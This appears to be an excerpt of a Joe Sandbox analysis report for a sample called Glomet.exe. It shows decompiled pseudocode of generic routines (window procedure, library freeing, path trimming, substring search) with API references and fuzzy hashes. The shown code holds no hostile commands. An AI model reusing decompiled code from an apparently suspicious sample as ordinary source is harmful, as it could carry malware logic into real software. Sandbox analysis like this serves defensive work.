                                                                                                                                                                              							__eflags =  *0x42a87c - _t16; // 0x0
                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                              								_push(_t16);
                                                                                                                                                                              								_push(6);
                                                                                                                                                                              								 *0x42a87c = _t16;
                                                                                                                                                                              								E00404CA7();
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						L11:
                                                                                                                                                                              						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
                                                                                                                                                                              					}
                                                                                                                                                                              					_t11 = IsWindowVisible(_a4);
                                                                                                                                                                              					__eflags = _t11;
                                                                                                                                                                              					if(_t11 == 0) {
                                                                                                                                                                              						L10:
                                                                                                                                                                              						_t16 = _a16;
                                                                                                                                                                              						goto L11;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t16 = E00404C27(_a4, 1);
                                                                                                                                                                              					_t15 = 0x419;
                                                                                                                                                                              					goto L7;
                                                                                                                                                                              				}
                                                                                                                                                                              				if(_a12 == 0x20) {
                                                                                                                                                                              					E00404320(0x413);
                                                                                                                                                                              					return 0;
                                                                                                                                                                              				}
                                                                                                                                                                              				goto L10;
                                                                                                                                                                              			}







                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 0040531B
                                                                                                                                                                              • CallWindowProcA.USER32 ref: 0040536C
                                                                                                                                                                                • Part of subcall function 00404320: SendMessageA.USER32(0005001C,00000000,00000000,00000000), ref: 00404332
                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                              • Opcode ID: 2bda5d118e415af4fa0da154639cfdb284582745e0818f00f9dac7c2683be084
                                                                                                                                                                              • Instruction ID: 088eb893e58e7befb787ec48b20f4cc5058787dea00b391af27f8784c6c771c5
                                                                                                                                                                              • Opcode Fuzzy Hash: 2bda5d118e415af4fa0da154639cfdb284582745e0818f00f9dac7c2683be084
                                                                                                                                                                              • Instruction Fuzzy Hash: 59017172204608ABEF206F11DD81A9B3769EB84395F541037FF05761D0C7BA8D629E2A
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004039A8() {
                                                                                                                                                                              				void* _t2;
                                                                                                                                                                              				void* _t3;
                                                                                                                                                                              				void* _t6;
                                                                                                                                                                              				void* _t8;
                                                                                                                                                                              
                                                                                                                                                                              				_t8 =  *0x429854; // 0x0
                                                                                                                                                                              				_t3 = E0040398D(_t2, 0);
                                                                                                                                                                              				if(_t8 != 0) {
                                                                                                                                                                              					do {
                                                                                                                                                                              						_t6 = _t8;
                                                                                                                                                                              						_t8 =  *_t8;
                                                                                                                                                                              						FreeLibrary( *(_t6 + 8));
                                                                                                                                                                              						_t3 = GlobalFree(_t6);
                                                                                                                                                                              					} while (_t8 != 0);
                                                                                                                                                                              				}
                                                                                                                                                                              				 *0x429854 =  *0x429854 & 0x00000000;
                                                                                                                                                                              				return _t3;
                                                                                                                                                                              			}








                                                                                                                                                                              APIs
                                                                                                                                                                              • FreeLibrary.KERNEL32(?,7620FA90,00000000,C:\Users\user\AppData\Local\Temp\,00403980,0040379A,?,?,00000007,00000009,0000000B), ref: 004039C2
                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 004039C9
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004039A8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                              • API String ID: 1100898210-3916508600
                                                                                                                                                                              • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                                                                                                                              • Instruction ID: 4fd9126d001fd6f9661ff5a064fa74b3c5ec8a5f3f5490ff4f649df82ed95c92
                                                                                                                                                                              • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                                                                                                                              • Instruction Fuzzy Hash: C5E0EC3261112057C7616F55EA0476AB7A86F49B66F0A006EE8847B2A08BB85C468BD8
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405C30(char* _a4) {
                                                                                                                                                                              				char* _t3;
                                                                                                                                                                              				char* _t5;
                                                                                                                                                                              
                                                                                                                                                                              				_t5 = _a4;
                                                                                                                                                                              				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                                                                                                              				while( *_t3 != 0x5c) {
                                                                                                                                                                              					_t3 = CharPrevA(_t5, _t3);
                                                                                                                                                                              					if(_t3 > _t5) {
                                                                                                                                                                              						continue;
                                                                                                                                                                              					}
                                                                                                                                                                              					break;
                                                                                                                                                                              				}
                                                                                                                                                                              				 *_t3 =  *_t3 & 0x00000000;
                                                                                                                                                                              				return  &(_t3[1]);
                                                                                                                                                                              			}






                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(80000000,C:\programdata,00402F78,C:\programdata,C:\programdata,C:\programdata\Glomet.exe,C:\programdata\Glomet.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009), ref: 00405C36
                                                                                                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\programdata,00402F78,C:\programdata,C:\programdata,C:\programdata\Glomet.exe,C:\programdata\Glomet.exe,80000000,00000003,?,?,004036FD,?), ref: 00405C44
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                                                                              • String ID: C:\programdata
                                                                                                                                                                              • API String ID: 2709904686-3893646742
                                                                                                                                                                              • Opcode ID: 46bbde6159133eac16457addd6c3fa88623ef59ff022f94c34d6ba2180d3974b
                                                                                                                                                                              • Instruction ID: 122f4ef1c51afe0287f8aef094741ea3ea5c8e0f1b3bdfc6c9647d6fbcc18736
                                                                                                                                                                              • Opcode Fuzzy Hash: 46bbde6159133eac16457addd6c3fa88623ef59ff022f94c34d6ba2180d3974b
                                                                                                                                                                              • Instruction Fuzzy Hash: 75D0A76240CA746EF30362108D00B9F6A88DF13340F0A04E6F081A2190C2784C424BFD
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405D4F(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                              				int _v8;
                                                                                                                                                                              				int _t12;
                                                                                                                                                                              				int _t14;
                                                                                                                                                                              				int _t15;
                                                                                                                                                                              				CHAR* _t17;
                                                                                                                                                                              				CHAR* _t27;
                                                                                                                                                                              
                                                                                                                                                                              				_t12 = lstrlenA(_a8);
                                                                                                                                                                              				_t27 = _a4;
                                                                                                                                                                              				_v8 = _t12;
                                                                                                                                                                              				while(lstrlenA(_t27) >= _v8) {
                                                                                                                                                                              					_t14 = _v8;
                                                                                                                                                                              					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                                                                                              					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                                                                                              					_t27[_v8] =  *(_t14 + _t27);
                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                              						_t17 = _t27;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						_t27 = CharNextA(_t27);
                                                                                                                                                                              						continue;
                                                                                                                                                                              					}
                                                                                                                                                                              					L5:
                                                                                                                                                                              					return _t17;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t17 = 0;
                                                                                                                                                                              				goto L5;
                                                                                                                                                                              			}










                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D77
                                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D88
                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                              • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                                                                                                              • Instruction ID: 87b880d6ec66590321046a57115c6c0db4d123b3cd257c49f1686e195a850605
                                                                                                                                                                              • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                                                                                                              • Instruction Fuzzy Hash: 0DF0F632200814FFCB02DFA4DD44D9FBBA8EF55350B2580BAE840F7210D634DE019BA8
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%